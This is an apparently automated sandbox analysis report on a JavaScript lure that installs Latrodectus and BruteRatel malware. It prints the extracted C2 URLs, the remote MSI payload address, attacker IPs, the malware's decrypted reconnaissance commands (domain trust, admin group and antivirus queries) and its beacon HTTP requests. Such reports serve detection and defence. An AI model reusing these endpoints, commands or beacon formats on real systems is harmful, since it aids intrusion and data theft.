Windows Analysis Report
Document-18-33-08.js

Overview

General Information

Sample name: Document-18-33-08.js
Analysis ID: 1525184
MD5: c05645ed2ec3ff5c541b99d20011a488
SHA1: 6822c03f0781ac932c31747610f1fe1039f6861f
SHA256: a9a4640e3887e4ee71ae0e0624afa6b8fa6a22cdffd190f1d83234109dd8496d
Tags: BruteRatelBruteRateljsuser-k3dg3___
Infos:

Detection

Bazar Loader, BruteRatel, Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Bazar Loader
Yara detected BruteRatel
Yara detected Latrodectus
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sample has a suspicious name (potential lure to open the executable)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript install MSI file from remote location
Checks for available system drives (often done to infect USB drives)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Name Description Attribution Blogpost URLs Link
Brute Ratel C4, BruteRatel Brute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment.This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4
Name Description Attribution Blogpost URLs Link
Latrodectus, Latrodectus First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus

AV Detection
barindex
Found malware configuration
Source: 8.0.explorer.exe.3050000.0.unpack Malware Configuration Extractor: Latrodectus {"C2 url": ["https://isomicrotich.com/test/", "https://opewolumeras.com/test/"], "Group Name": "Alpha", "Campaign ID": 55079499}
Sample uses string decryption to hide its real strings
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c ipconfig /all
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c systeminfo
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c nltest /domain_trusts
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c net view /all
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c nltest /domain_trusts /all_trusts
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c net view /all /domain
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &ipconfig=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c net group "Domain Admins" /domain
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c net config workstation
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /c whoami /groups
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &systeminfo=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &domain_trusts=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &domain_trusts_all=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &net_view_all_domain=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &net_view_all=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &net_group=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &wmic=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &net_config_ws=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &net_wmic_av=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &whoami_group=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "pid":
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "%d",
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "proc":
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "%s",
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "subproc": [
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &proclist=[
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "pid":
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "%d",
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "proc":
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "%s",
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "subproc": [
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &desklinks=[
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: *.*
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "%s"
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Update_%x
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Custom_update
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: .dll
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: .exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Error
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: runnung
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: %s/%s
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: front
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: /files/
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Alpha
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Cookie:
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: POST
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: GET
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: curl/7.88.1
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: CLEARURL
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: URLS
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: COMMAND
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: ERROR
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: VHzTOEx62sr5cYaQrGJbsm05R2gZwO1VTkHTNfF8DAm5aNNw1n
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: [{"data":"
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: "}]
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &dpost=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: https://isomicrotich.com/test/
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: https://opewolumeras.com/test/
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: \*.dll
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: AppData
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Desktop
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Startup
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Personal
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Local AppData
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: %s%d.dll
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: <!DOCTYPE
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Content-Length: 0
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: <html>
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Content-Type: application/dns-message
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: Content-Type: application/ocsp-request
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: 12345
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: 12345
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &stiller=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: %s%d.exe
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: %x%x
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &mac=
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: %02x
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: :%02x
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &computername=%s
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: &domain=%s
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: LogonTrigger
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: \Registry\Machine\
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: TimeTrigger
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: PT0H%02dM
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: PT0S
Source: 8.0.explorer.exe.3050000.0.unpack String decryptor: \update_data.dat
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50048 version: TLS 1.2
Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000006.00000003.2069928053.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmp, vierm_soft_x64.dll.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIF29D.tmp, 00000004.00000000.2061647641.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSIF29D.tmp, 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSI7623.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000006.00000003.2066566980.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: kernel32.pdb source: rundll32.exe, 00000006.00000003.2069928053.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000006.00000003.2066566980.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF160.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF160.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIF29D.tmp, 00000004.00000000.2061647641.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSIF29D.tmp, 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSI7623.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr
Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp
Checks for available system drives (often done to infect USB drives)
Source: C:\Windows\System32\msiexec.exe File opened: z: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: x: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: v: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: t: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: r: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: p: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: n: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: l: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: j: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: h: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: f: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: b: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: y: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: w: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: u: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: s: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: q: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: o: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: m: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: k: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: i: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: g: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: e: Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp File opened: c: Jump to behavior
Source: C:\Windows\System32\msiexec.exe File opened: a: Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FEAF79 FindFirstFileExW, 4_2_00FEAF79
Source: C:\Windows\explorer.exe Code function: 8_2_0305A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW, 8_2_0305A8E0
Source: C:\Windows\explorer.exe Code function: 8_2_03052B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 8_2_03052B28
Source: C:\Windows\explorer.exe Code function: 8_2_030604C0 FindFirstFileW, 8_2_030604C0

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50053 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50048 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50050 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50051 -> 188.114.96.3:443
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exe Network Connect: 82.115.223.39 8041 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 443 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Network Connect: 80.78.24.30 8041 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://isomicrotich.com/test/
Source: Malware configuration extractor URLs: https://opewolumeras.com/test/
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49897
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49903
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49910
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49912
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50030
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50030
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50036
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50039
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50040
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50042
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50043
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50052
Wscript install MSI file from remote location
Source: http://188.119.112.7/das.msi IID Installer: C:\Windows\System32\wscript.exe
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49705 -> 80.78.24.30:8041
Source: global traffic TCP traffic: 192.168.2.5:49708 -> 82.115.223.39:8041
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 82.115.223.39 82.115.223.39
Source: Joe Sandbox View IP Address: 80.78.24.30 80.78.24.30
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: MIDNET-ASTK-TelecomRU MIDNET-ASTK-TelecomRU
Source: Joe Sandbox View ASN Name: CYBERDYNELR CYBERDYNELR
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFh9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 92Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFg9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFj9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFi9baN0mUbkry70/OBhj9kRFFApZBql4EawZnSN3QqrUnsIQw7QdOqesy9dmntVXFHGxw5Mv+gazRt6m8J8V5Hg/GvY9DvAc6Ya81lXDJyArkIA11NUownH3IB6Y0gtSx3OHp9NFR/n0+B0klqqp57yBUl1vBMDU1wr4wR8ps=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: unknown TCP traffic detected without corresponding DNS query: 188.119.112.7
Source: C:\Windows\explorer.exe Code function: 8_2_03055078 InternetReadFile, 8_2_03055078
Source: global traffic HTTP traffic detected: GET /das.msi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows InstallerHost: 188.119.112.7
Source: global traffic DNS traffic detected: DNS query: bazarunet.com
